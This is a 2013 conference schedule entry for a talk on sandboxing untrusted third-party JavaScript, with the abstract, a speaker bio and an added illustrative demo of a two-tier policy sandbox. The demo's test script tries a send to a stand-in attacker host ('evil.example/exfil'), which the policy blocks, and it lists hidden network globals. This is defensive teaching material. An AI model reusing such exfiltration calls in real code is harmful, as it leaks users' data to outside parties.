Wednesday, November 20 • 4:00pm - 4:50pm
Sandboxing JavaScript via Libraries and Wrappers


The large majority of websites nowadays embed third-party JavaScript into their pages, coming from external partners. Ideally, these scripts are benign and come from trusted sources, but over time these third-party scripts can start to misbehave or come under the control of an attacker. Unfortunately, the state-of-practice integration techniques for third-party scripts do not impose restrictions on the execution of JavaScript code, allowing such an attacker to perform unwanted actions on behalf of the website owner and/or website visitor.
In this paper, we present a two-tier sandbox architecture to enable a website owner to enforce modular, fine-grained security policies for potentially untrusted third-party JavaScript code. The architecture contains an outer sandbox that provides strong baseline isolation guarantees with generic, coarse-grained policies, and an inner sandbox that enables fine-grained, stateful policy enforcement specific to a particular untrusted application. The two-tier approach ensures that the application-specific policies and the untrusted code are by default confined to a basic security policy, without imposing restrictions on the expressiveness of the policies.
Our proposed architecture improves upon the state-of-the-art as it depends neither on browser modification nor on pre-processing or transformation of untrusted code, and it allows the secure enforcement of fine-grained, stateful access control policies. We have developed a prototype implementation on top of an open-source sandbox library for the ECMAScript 5 specification, and validated it with several real-world JavaScript applications such as Google Analytics, Google Maps, and jQuery UI.
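The following JavaScript is an added illustration of the two-tier idea in the abstract, written for this page; it is not the paper's prototype nor the sandbox library it builds on. The outer tier hands the untrusted script a frozen baseline object and nothing else, and the inner tier composes an application-specific, stateful policy (a send quota and an origin allow-list) on top of that baseline, so the policy can only narrow what the outer tier exposes. The function names (`makeBaseline`, `makeInner`, `runUntrusted`), the policy fields (`maxSends`, `allowedOrigins`), the `net.send` stand-in for a network primitive, and the third-party script and origins are all constructed for the example.

```javascript
"use strict";

// Added illustration of the two-tier sandbox idea; not the paper's prototype.
// Names (makeBaseline, makeInner, runUntrusted, policy fields) are assumed.

// Outer sandbox: a minimal, frozen baseline API. It is the only thing the
// untrusted script is meant to see, so everything not listed here is out of
// reach. Freezing also stops the script from monkey-patching `send` or
// attaching new members to smuggle state between calls.
function makeBaseline(log) {
  const net = Object.freeze({
    // Stand-in for a real network primitive (XHR/fetch); it only records the call.
    send: (url) => { log.push("net.send " + url); return "ok"; }
  });
  return Object.freeze({
    log: (msg) => { log.push(String(msg)); },
    net: net
  });
}

// Inner sandbox: application-specific, stateful wrappers composed on top of
// the baseline. The policy receives the baseline object and nothing else, so
// it cannot reach anything the outer tier did not already hand it.
function makeInner(baseline, policy) {
  let sends = 0; // policy state lives in this closure, out of the script's reach
  const net = Object.freeze({
    send: (url) => {
      const origin = new URL(url).origin;
      if (!policy.allowedOrigins.includes(origin)) {
        throw new Error("policy: origin not allowed: " + origin);
      }
      if (sends >= policy.maxSends) {
        throw new Error("policy: send quota exceeded");
      }
      sends += 1;
      return baseline.net.send(url);
    }
  });
  return Object.freeze({ log: baseline.log, net: net });
}

// Runs untrusted source with `sandbox` as its only intended environment.
// The extra parameter names shadow ambient globals so plain references to
// them resolve to undefined, and "use strict" keeps `this` from being the
// global object. This is the library-and-wrapper style the talk describes,
// reduced to its essentials: a production sandbox needs a complete membrane,
// because parameter shadowing alone does not close every path to the global
// object.
const HIDDEN = ["globalThis", "window", "document", "process", "require",
                "XMLHttpRequest", "fetch", "Function"];
function runUntrusted(source, sandbox) {
  const fn = new Function("sandbox", ...HIDDEN, '"use strict";\n' + source);
  return fn(sandbox);
}

// Constructed third-party script: two permitted sends, one over quota,
// one to a disallowed origin, then a probe of the hidden globals.
const THIRD_PARTY_SCRIPT = `
  sandbox.log("hello from third party");
  sandbox.net.send("https://analytics.example/collect?e=1");
  sandbox.net.send("https://analytics.example/collect?e=2");
  var outcome = [];
  try { sandbox.net.send("https://analytics.example/collect?e=3"); }
  catch (e) { outcome.push(e.message); }
  try { sandbox.net.send("https://evil.example/exfil"); }
  catch (e) { outcome.push(e.message); }
  outcome.push(typeof process, typeof document, typeof require);
  return outcome;
`;

// Wires the two tiers together and runs the constructed script through them.
function demo() {
  const log = [];
  const baseline = makeBaseline(log);
  const inner = makeInner(baseline, {
    maxSends: 2,
    allowedOrigins: ["https://analytics.example"]
  });
  const outcome = runUntrusted(THIRD_PARTY_SCRIPT, inner);
  return { log: log, outcome: outcome };
}

console.log(JSON.stringify(demo(), null, 2));
```

Run it with `node`: the log shows the two permitted sends, and the script's own `outcome` array records the quota rejection, the origin rejection, and `"undefined"` for each shadowed global. The design point is that the inner policy is ordinary JavaScript a site owner writes per application, yet a bug in that policy cannot widen access beyond the baseline, because the policy never holds a reference to anything but the frozen baseline object.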

Speakers

Phu Phung

Research Associate, University of Illinois at Chicago
Dr Phu Phung is a Research Associate at the University of Illinois at Chicago from December 2012, employed by the University of Gothenburg, Sweden. From October 2011 to December 2012, he was a postdoctoral researcher at the Department of Computer Science and Engineering, Chalmers University...


Wednesday November 20, 2013 4:00pm - 4:50pm
Belasco & Broadhurst (5th Floor) NY Marriott Marquis
